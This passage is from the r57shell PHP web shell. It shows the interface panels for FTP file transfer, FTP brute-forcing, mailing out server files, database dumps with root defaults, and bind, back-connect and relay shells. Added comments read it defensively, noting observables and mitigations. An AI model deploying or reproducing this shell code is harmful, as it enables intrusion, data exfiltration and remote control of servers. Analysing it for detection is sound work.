2109 echo sr(15,"<b>".$lang[$language.'_text91'].$arrow."</b>",in('radio','compress',0,'none',1).' '.$arh);
2110 echo $te.'</div>'.$table_end1.$fe;
// FTP transfer panel; drawn only when PHP's ftp_connect() is available.
// Two side-by-side forms share the same field names (`ftp_server_port`,
// `ftp_login`, `ftp_password`, `ftp_file`, `loc_file`, `ftp_mode`, hidden `dir`)
// and differ only in the hidden `cmd`: 'ftp_file_down' (left) and 'ftp_file_up' (right).
// Each text field is pre-filled with the value from the previous POST when one
// is present, otherwise with a placeholder default.
// NOTE(review): the raw $_POST values are handed straight to in(); whether in()
// HTML-escapes them is not visible here.
// Defender note: outbound FTP control connections originating from the web
// server account are the observable; blocking outbound port 21 for that account
// removes this staging/exfiltration path.
2111 if(@function_exists("ftp_connect")){
2112 echo $table_up1.div_title($lang[$language.'_text93'],'id17').$table_up2.div('id17').$ts."<tr>".$fs."<td valign=top width=50%>".$ts;
2113 echo "<font face=Verdana size=-2><b><div align=center id='n'>".$lang[$language.'_text87']."</div></b></font>";
2114 echo sr(25,"<b>".$lang[$language.'_text88'].$arrow."</b>",in('text','ftp_server_port',45,(!empty($_POST['ftp_server_port'])?($_POST['ftp_server_port']):("127.0.0.1:21"))));
2115 echo sr(25,"<b>".$lang[$language.'_text37'].$arrow."</b>",in('text','ftp_login',45,(!empty($_POST['ftp_login'])?($_POST['ftp_login']):("anonymous"))));
2116 echo sr(25,"<b>".$lang[$language.'_text38'].$arrow."</b>",in('text','ftp_password',45,(!empty($_POST['ftp_password'])?($_POST['ftp_password']):("billy@microsoft.com"))));
2117 echo sr(25,"<b>".$lang[$language.'_text89'].$arrow."</b>",in('text','ftp_file',45,(!empty($_POST['ftp_file'])?($_POST['ftp_file']):("/ftp-dir/file"))).in('hidden','cmd',0,'ftp_file_down'));
2118 echo sr(25,"<b>".$lang[$language.'_text18'].$arrow."</b>",in('text','loc_file',45,$dir));
2119 echo sr(25,"<b>".$lang[$language.'_text90'].$arrow."</b>","<select name=ftp_mode><option>FTP_BINARY</option><option>FTP_ASCII</option></select>".in('hidden','dir',0,$dir));
2120 echo sr(25,"",in('submit','submit',0,$lang[$language.'_butt14']));
2121 echo $te."</td>".$fe.$fs."<td valign=top width=50%>".$ts;
2122 echo "<font face=Verdana size=-2><b><div align=center id='n'>".$lang[$language.'_text100']."</div></b></font>";
2123 echo sr(25,"<b>".$lang[$language.'_text88'].$arrow."</b>",in('text','ftp_server_port',45,(!empty($_POST['ftp_server_port'])?($_POST['ftp_server_port']):("127.0.0.1:21"))));
2124 echo sr(25,"<b>".$lang[$language.'_text37'].$arrow."</b>",in('text','ftp_login',45,(!empty($_POST['ftp_login'])?($_POST['ftp_login']):("anonymous"))));
2125 echo sr(25,"<b>".$lang[$language.'_text38'].$arrow."</b>",in('text','ftp_password',45,(!empty($_POST['ftp_password'])?($_POST['ftp_password']):("billy@microsoft.com"))));
2126 echo sr(25,"<b>".$lang[$language.'_text18'].$arrow."</b>",in('text','loc_file',45,$dir));
2127 echo sr(25,"<b>".$lang[$language.'_text89'].$arrow."</b>",in('text','ftp_file',45,(!empty($_POST['ftp_file'])?($_POST['ftp_file']):("/ftp-dir/file"))).in('hidden','cmd',0,'ftp_file_up'));
2128 echo sr(25,"<b>".$lang[$language.'_text90'].$arrow."</b>","<select name=ftp_mode><option>FTP_BINARY</option><option>FTP_ASCII</option></select>".in('hidden','dir',0,$dir));
2129 echo sr(25,"",in('submit','submit',0,$lang[$language.'_butt2']));
2130 echo $te."</td>".$fe."</tr></div></table>";
2131 }
// Panel that posts a hidden `cmd` of 'ftp_brute'; drawn only when $unix is true
// and ftp_connect() exists. Fields: `ftp_server_port` (previous POST value or
// "127.0.0.1:21") and a `reverse` checkbox. It also links to the script itself
// with the query string `?users`.
// The handler is outside this excerpt, so what 'ftp_brute' and `?users` actually
// do is not established here; the names suggest FTP credential guessing driven
// by a user list - treat as an assumption.
// NOTE(review): $_SERVER['PHP_SELF'] is written into the href without escaping.
// Defender note: on the FTP side the observable would be a burst of failed
// logins from the web host's address (127.0.0.1 by default); rate limiting and
// lockout on the FTP daemon are the mitigations.
2132 if($unix && @function_exists("ftp_connect")){
2133 echo $fs.$table_up1.div_title($lang[$language.'_text94'],'id18').$table_up2.div('id18').$ts;
2134 echo sr(15,"<b>".$lang[$language.'_text88'].$arrow."</b>",in('text','ftp_server_port',85,(!empty($_POST['ftp_server_port'])?($_POST['ftp_server_port']):("127.0.0.1:21"))).in('hidden','cmd',0,'ftp_brute').ws(4).in('submit','submit',0,$lang[$language.'_butt1']));
2135 echo sr(15,"","<font face=Verdana size=-2>".$lang[$language.'_text99']." ( <a href=".$_SERVER['PHP_SELF']."?users>".$lang[$language.'_text95']."</a> )</font>");
2136 echo sr(15,"",in('checkbox','reverse id=reverse',0,'1').$lang[$language.'_text101']);
2137 echo $te.'</div>'.$table_end1.$fe;
2138 }
// Mail panel; drawn only when PHP's mail() is available.
// Left form: hidden `cmd` 'mail' with `to`, `from`, `subj` and a `text` textarea.
// Right form: hidden `cmd` 'mail_file' with `to`, `from`, `subj`, `loc_file`
// (pre-filled with $dir) and the `compress` radio set built from $arh, which is
// assigned earlier in the script, outside this block.
// Fields are pre-filled from the previous POST when present.
// NOTE(review): $_POST['text'] is concatenated directly into the <textarea>
// markup with no escaping visible on this line.
// Defender note: mail originating from the web server account, with a
// caller-chosen From header and local files attached, is both a spam-relay and
// an exfiltration channel; restricting or logging the MTA for that account and
// listing mail() in disable_functions where it is not needed closes it.
2139 if(@function_exists("mail")){
2140 echo $table_up1.div_title($lang[$language.'_text102'],'id19').$table_up2.div('id19').$ts."<tr>".$fs."<td valign=top width=50%>".$ts;
2141 echo "<font face=Verdana size=-2><b><div align=center id='n'>".$lang[$language.'_text103']."</div></b></font>";
2142 echo sr(25,"<b>".$lang[$language.'_text105'].$arrow."</b>",in('text','to',45,(!empty($_POST['to'])?($_POST['to']):("hacker@mail.com"))).in('hidden','cmd',0,'mail').in('hidden','dir',0,$dir));
2143 echo sr(25,"<b>".$lang[$language.'_text106'].$arrow."</b>",in('text','from',45,(!empty($_POST['from'])?($_POST['from']):("billy@microsoft.com"))));
2144 echo sr(25,"<b>".$lang[$language.'_text107'].$arrow."</b>",in('text','subj',45,(!empty($_POST['subj'])?($_POST['subj']):("hello billy"))));
2145 echo sr(25,"<b>".$lang[$language.'_text108'].$arrow."</b>",'<textarea name=text cols=33 rows=2>'.(!empty($_POST['text'])?($_POST['text']):("mail text here")).'</textarea>');
2146 echo sr(25,"",in('submit','submit',0,$lang[$language.'_butt15']));
2147 echo $te."</td>".$fe.$fs."<td valign=top width=50%>".$ts;
2148 echo "<font face=Verdana size=-2><b><div align=center id='n'>".$lang[$language.'_text104']."</div></b></font>";
2149 echo sr(25,"<b>".$lang[$language.'_text105'].$arrow."</b>",in('text','to',45,(!empty($_POST['to'])?($_POST['to']):("hacker@mail.com"))).in('hidden','cmd',0,'mail_file').in('hidden','dir',0,$dir));
2150 echo sr(25,"<b>".$lang[$language.'_text106'].$arrow."</b>",in('text','from',45,(!empty($_POST['from'])?($_POST['from']):("billy@microsoft.com"))));
2151 echo sr(25,"<b>".$lang[$language.'_text107'].$arrow."</b>",in('text','subj',45,(!empty($_POST['subj'])?($_POST['subj']):("file from r57shell"))));
2152 echo sr(25,"<b>".$lang[$language.'_text18'].$arrow."</b>",in('text','loc_file',45,$dir));
2153 echo sr(25,"<b>".$lang[$language.'_text91'].$arrow."</b>",in('radio','compress',0,'none',1).' '.$arh);
2154 echo sr(25,"",in('submit','submit',0,$lang[$language.'_butt15']));
2155 echo $te."</td>".$fe."</tr></div></table>";
2156 }
// Database panel; drawn when at least one of $mysql_on / $mssql_on / $pg_on /
// $ora_on is set (those flags are assigned outside this excerpt).
// $select is a <select name=db> listing only the engines whose flag is true.
// Left form: hidden `cmd` 'mysql_dump' with `db_server`, `db_port`, `mysql_l`,
// `mysql_p`, `mysql_db`, `mysql_tbl`, and an optional save-to-file choice
// (`dif` checkbox plus `dif_name`, default "dump.sql").
// Right form: hidden `cmd` 'db_query' with the same connection fields and a
// free-text `db_query` textarea.
// The `mysql_*` field names are used for every engine in the list.
// NOTE(review): $_POST['db_query'] is concatenated into the <textarea> markup
// with no escaping visible on this line.
// Defender note: the value of this panel to an intruder depends on the web host
// being able to reach a database with credentials found on disk; least-privilege
// DB accounts, network segmentation between web and DB tiers, and alerting on
// bulk SELECT/dump activity from application accounts limit the impact.
2157 if($mysql_on||$mssql_on||$pg_on||$ora_on)
2158 {
2159 $select = '<select name=db>';
2160 if($mysql_on) $select .= '<option>MySQL</option>';
2161 if($mssql_on) $select .= '<option>MSSQL</option>';
2162 if($pg_on) $select .= '<option>PostgreSQL</option>';
2163 if($ora_on) $select .= '<option>Oracle</option>';
2164 $select .= '</select>';
2165 echo $table_up1.div_title($lang[$language.'_text82'],'id20').$table_up2.div('id20').$ts."<tr>".$fs."<td valign=top width=50%>".$ts;
2166 echo "<font face=Verdana size=-2><b><div align=center id='n'>".$lang[$language.'_text40']."</div></b></font>";
2167 echo sr(35,"<b>".$lang[$language.'_text80'].$arrow."</b>",$select);
2168 echo sr(35,"<b>".$lang[$language.'_text111'].$arrow."</b>",in('text','db_server',15,(!empty($_POST['db_server'])?($_POST['db_server']):("localhost"))).' <b>:</b> '.in('text','db_port',15,(!empty($_POST['db_port'])?($_POST['db_port']):("3306"))));
2169 echo sr(35,"<b>".$lang[$language.'_text37'].' : '.$lang[$language.'_text38'].$arrow."</b>",in('text','mysql_l',15,(!empty($_POST['mysql_l'])?($_POST['mysql_l']):("root"))).' <b>:</b> '.in('text','mysql_p',15,(!empty($_POST['mysql_p'])?($_POST['mysql_p']):("password"))));
2170 echo sr(35,"<b>".$lang[$language.'_text36'].$arrow."</b>",in('text','mysql_db',15,(!empty($_POST['mysql_db'])?($_POST['mysql_db']):("mysql"))).' <b>.</b> '.in('text','mysql_tbl',15,(!empty($_POST['mysql_tbl'])?($_POST['mysql_tbl']):("user"))));
2171 echo sr(35,in('hidden','dir',0,$dir).in('hidden','cmd',0,'mysql_dump')."<b>".$lang[$language.'_text41'].$arrow."</b>",in('checkbox','dif id=dif',0,'1').in('text','dif_name',31,(!empty($_POST['dif_name'])?($_POST['dif_name']):("dump.sql"))));
2172 echo sr(35,"",in('submit','submit',0,$lang[$language.'_butt9']));
2173 echo $te."</td>".$fe.$fs."<td valign=top width=50%>".$ts;
2174 echo "<font face=Verdana size=-2><b><div align=center id='n'>".$lang[$language.'_text83']."</div></b></font>";
2175 echo sr(35,"<b>".$lang[$language.'_text80'].$arrow."</b>",$select);
2176 echo sr(35,"<b>".$lang[$language.'_text111'].$arrow."</b>",in('text','db_server',15,(!empty($_POST['db_server'])?($_POST['db_server']):("localhost"))).' <b>:</b> '.in('text','db_port',15,(!empty($_POST['db_port'])?($_POST['db_port']):("3306"))));
2177 echo sr(35,"<b>".$lang[$language.'_text37'].' : '.$lang[$language.'_text38'].$arrow."</b>",in('text','mysql_l',15,(!empty($_POST['mysql_l'])?($_POST['mysql_l']):("root"))).' <b>:</b> '.in('text','mysql_p',15,(!empty($_POST['mysql_p'])?($_POST['mysql_p']):("password"))));
2178 echo sr(35,"<b>".$lang[$language.'_text39'].$arrow."</b>",in('text','mysql_db',15,(!empty($_POST['mysql_db'])?($_POST['mysql_db']):("mysql"))));
2179 echo sr(35,"<b>".$lang[$language.'_text84'].$arrow."</b>".in('hidden','dir',0,$dir).in('hidden','cmd',0,'db_query'),"");
2180 echo $te."<div align=center id='n'><textarea cols=55 rows=1 name=db_query>".(!empty($_POST['db_query'])?($_POST['db_query']):("SHOW DATABASES; SELECT * FROM user; SELECT version(); select user();"))."</textarea><br>".in('submit','submit',0,$lang[$language.'_butt1'])."</div></td>".$fe."</tr></div></table>";
2181 }
// Network panel; drawn only when $safe_mode is false and $unix is true.
// Three forms in one table row, none of which carries a hidden `cmd` field:
//   1. `port` (default '11457'), `bind_pass` (default 'r57'), `use` (Perl or C)
//   2. `ip` (pre-filled with REMOTE_ADDR, else "127.0.0.1"), `port`, `use`
//   3. `local_port`, `remote_host`, `remote_port`, `use` (labelled datapipe.pl / datapipe.c)
// The handlers are outside this excerpt; from the field names these look like a
// listening shell, an outbound (connect-back) shell and a TCP relay - confirm
// against the handler code before relying on that reading.
// Form 2 defaults its target to the address of whoever is viewing the page.
// Defender note: the defaults shown here are trivially changed, so match on
// behaviour rather than on port 11457: the web server account opening a
// listening socket, making outbound connections to arbitrary hosts, or spawning
// perl or a C compiler. Default-deny egress and no compiler/interpreter access
// for that account are the preventive controls.
2182 if(!$safe_mode&&$unix){
2183 echo $table_up1.div_title($lang[$language.'_text81'],'id21').$table_up2.div('id21').$ts."<tr>".$fs."<td valign=top width=34%>".$ts;
2184 echo "<font face=Verdana size=-2><b><div align=center id='n'>".$lang[$language.'_text9']."</div></b></font>";
2185 echo sr(40,"<b>".$lang[$language.'_text10'].$arrow."</b>",in('text','port',15,'11457'));
2186 echo sr(40,"<b>".$lang[$language.'_text11'].$arrow."</b>",in('text','bind_pass',15,'r57'));
2187 echo sr(40,"<b>".$lang[$language.'_text20'].$arrow."</b>","<select size=\"1\" name=\"use\"><option value=\"Perl\">Perl</option><option value=\"C\">C</option></select>".in('hidden','dir',0,$dir));
2188 echo sr(40,"",in('submit','submit',0,$lang[$language.'_butt3']));
2189 echo $te."</td>".$fe.$fs."<td valign=top width=33%>".$ts;
2190 echo "<font face=Verdana size=-2><b><div align=center id='n'>".$lang[$language.'_text12']."</div></b></font>";
2191 echo sr(40,"<b>".$lang[$language.'_text13'].$arrow."</b>",in('text','ip',15,((getenv('REMOTE_ADDR')) ? (getenv('REMOTE_ADDR')) : ("127.0.0.1"))));
2192 echo sr(40,"<b>".$lang[$language.'_text14'].$arrow."</b>",in('text','port',15,'11457'));
2193 echo sr(40,"<b>".$lang[$language.'_text20'].$arrow."</b>","<select size=\"1\" name=\"use\"><option value=\"Perl\">Perl</option><option value=\"C\">C</option></select>".in('hidden','dir',0,$dir));
2194 echo sr(40,"",in('submit','submit',0,$lang[$language.'_butt4']));
2195 echo $te."</td>".$fe.$fs."<td valign=top width=33%>".$ts;
2196 echo "<font face=Verdana size=-2><b><div align=center id='n'>".$lang[$language.'_text22']."</div></b></font>";
2197 echo sr(40,"<b>".$lang[$language.'_text23'].$arrow."</b>",in('text','local_port',15,'11457'));
2198 echo sr(40,"<b>".$lang[$language.'_text24'].$arrow."</b>",in('text','remote_host',15,'irc.dalnet.ru'));
2199 echo sr(40,"<b>".$lang[$language.'_text25'].$arrow."</b>",in('text','remote_port',15,'6667'));
2200 echo sr(40,"<b>".$lang[$language.'_text26'].$arrow."</b>","<select size=\"1\" name=\"use\"><option value=\"Perl\">datapipe.pl</option><option value=\"C\">datapipe.c</option></select>".in('hidden','dir',0,$dir));
2201 echo sr(40,"",in('submit','submit',0,$lang[$language.'_butt5']));
2202 echo $te."</td>".$fe."</tr></div></table>";
2203 }
// Page footer: closes the outer table, prints a banner naming the tool, its
// authors' sites and $version, then closes <body>/<html>.
// Defender note: the literal banner text ("r57shell - http-shell by RST/GHC")
// and the form field names used throughout this script are convenient
// file-content signatures for scanning web roots, but they are plain strings
// that a modified copy can drop - pair signature matching with integrity
// monitoring of the docroot and behavioural alerts on the web server account.
2204 echo '</table>'.$table_up3."</div></div><div align=center id='n'><font face=Verdana size=-2><b>o---[ r57shell - http-shell by RST/GHC | <a href=http://rst.void.ru>http://rst.void.ru</a> | <a href=http://ghc.ru>http://ghc.ru</a> | version ".$version." ]---o</b></font></div></td></tr></table>".$f;
2205 echo '</body></html>';
2206 ?>